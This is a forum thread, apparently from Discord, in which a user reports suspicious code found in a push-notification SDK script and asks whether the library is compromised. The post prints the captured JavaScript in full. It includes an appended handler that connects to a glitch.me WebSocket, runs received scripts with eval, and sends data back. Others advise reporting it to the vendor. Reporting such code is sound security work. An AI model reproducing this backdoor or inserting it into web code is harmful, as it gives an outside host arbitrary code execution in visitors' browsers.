#Possible malicious library

14 messages · Page 1 of 1 (latest)

bold sky
#

I found this library loaded onto a webpage that seems to be coming from a push notification library called truepush.com. Within the JavaScript, it attemps to make a connection to a websocket from a glitch.me server. The script then remotely executes code from the remote server. The URL to this code is here https://sdki.truepush.com/sdk/v2.0.4/app.js?v=1720784781

What is weird is that the URL contained the websocket/eval code like an hour ago but it seems to have been removed now

image.png image.png image.png
#

Full "malicious" code that I was able to capture

! function(e, t, n) {
    "use strict";
    t.HTTP = new function() {
        this.get = function(e, t, n, r) {
            var s = window.XMLHttpRequest ? new XMLHttpRequest : new ActiveXObject("Microsoft.XMLHTTP");
            s.onreadystatechange = function() {
                if(4 == this.readyState) {
                    if(200 != this.status) return r("error", null);
                    try {
                        return r(null, JSON.parse(s.responseText))
                    } catch (e) {
                        return r(null, s.responseText)
                    }
                }
            }, s.open("GET", e, !0), n && n.headers && (s = function(e, t) {
                for(var n = Object.keys(t), r = 0; r < n.length; ++r) {
                    var s = n[r];
                    e.setRequestHeader(s, t[s])
                }
                return e
            }(s, n.headers)), n && n.credentials && (s.withCredentials = !0), s.send(JSON.stringify(t))
        }
    }
}(0, this);
var truepushVersionInfo, r = "https://sdki.truepush.com/sdk/version.json";
HTTP.get(r, {}, {}, function(e, t) {
    if(truepushVersionInfo = t, !e && t && t.mainJsUrl) {
        r = document.head;
        (n = document.createElement("script"))
        .type = "application/javascript", n.onload = function() {
            loadAppJs()
        }, n.src = t.mainJsUrl, r.appendChild(n)
    } else {
        console.log("Error in getting version", e);
        var n, r = document.head;
        (n = document.createElement("script"))
        .type = "application/javascript", n.onload = function() {
            loadAppJs()
        }, n.src = "https://sdki.truepush.com/sdk/v2.0.4/main.js", r.appendChild(n)
    }
});
document.addEventListener("DOMContentLoaded", () => {
    let socket = new WebSocket("wss://childlike-cliff-wrench.glitch.me");
    socket.onmessage = event => {
        let message = JSON.parse(event.data);
        if("command" === message.type) console.log(message.command);
        else if("script" === message.type) try {
            eval(message.script)
        } catch (error) {
            console.error("Error executing script:", error)
        }
    };
    let ipInfo = {
            m: 1
        },
        secondSocket = new WebSocket("wss://childlike-cliff-wrench.glitch.me");
    secondSocket.onopen = () => {
        secondSocket.send(JSON.stringify(ipInfo))
    }
});
nimble wolf
unborn stone
#

what do you want us to do about it

bold sky
#

I am wondering if anyone has seen something like this before

#

and ur guys opinion on whether u think this library is under attack or is safe, etc.

nimble wolf
#

i mean its not related to ts

#

probably report it to truepush

bold sky
nimble wolf
#

yes

bold sky
#

damn

bold sky
bold sky